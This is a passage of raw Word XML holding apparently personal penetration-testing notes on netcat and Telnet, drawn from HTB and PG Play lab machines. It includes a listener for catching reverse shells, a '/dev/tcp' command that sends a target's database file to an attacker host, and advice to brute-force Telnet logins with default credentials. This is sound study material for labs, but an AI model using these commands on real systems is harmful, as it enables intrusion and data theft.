          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.76.101 6000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"n" is for no domain resolving (just use IP) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="191"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"v" is for verbose</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000120F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001210">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want to catch UDP reverse shells:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001211">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap nc -lvnup 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001212">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="925"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You have to add the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">flag</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-lvnp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001215">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-l </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Listen mode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001216">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Verbose.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001217">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-n </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Numeric-only IPs (no DNS resolution).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001218">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="983"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-p &lt;port&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ Port number.</w:t>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t xml:space="preserve">We can use netcat to transfer files. More specifically, we use cat to read the file and "write" its contents to a local file using netcat. </w:t>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t xml:space="preserve">For example, if we find a database (in our example, it's a sqlite3 .db file from Codify HTB), we did this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On your local machine: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 2222 &gt; tickets.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine (where tickets.db located): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000121F">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat tickets.db &gt; /dev/tcp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001220">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1056"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then in our example, we can now interact with tickets.db locally:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001221">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3 tickets.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001222">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Trying running "strings" on it or use sqlite or use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install sqlitebrowser</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view it using GUI</w:t>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t xml:space="preserve">Sometimes, when you open a website and the output doesn't seem correct or you get an error message, try connecting via netcat instead of firefox. This is seen in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId354">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001227">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3338513" cy="1110607"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="564" name="image555.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image555.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId355"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3338513" cy="1110607"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001228">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1400"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We get this weird error message even though it never prompts us for username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001229">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3633788" cy="1004168"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="573" name="image548.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image548.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId356"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3633788" cy="1004168"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1242"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So we connect via netcat which allows us to finally put in username and password </w:t>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pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7w65w3ow6inh" w:id="151"/>
      <w:bookmarkEnd w:id="151"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When blindly trying stuff, try these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001232">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001233">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001234">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">menu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001235">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001236">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1095"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ver</w:t>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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet can be confusing because it can be seen in two different ways:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001239">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet as a service (on port 23)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet is open on port 23, and when you see that, you can connect to it using the command: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">telnet [IP] [port number]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you connect, it will prompt you for a login, maybe it will take a few seconds though</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then you can try and brute force login, but try some common default credential first:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin, root, user, guest, anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000123F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet as a Tool (Command-Line Application)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001240">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Telnet is ALSO a tool in the command line. The Telnet application is a network debugging tool that allows you to open raw TCP connections to any port on a target system (not just port 23). It's protocol-agnostic and doesn't care what kind of service is running on the port—it just opens a channel for you to send and receive data manually.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001241">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1488"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the Telnet application to connect to:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001242">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP services (port 80):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Send raw HTTP commands like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="188038"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001243">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP servers (port 25):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
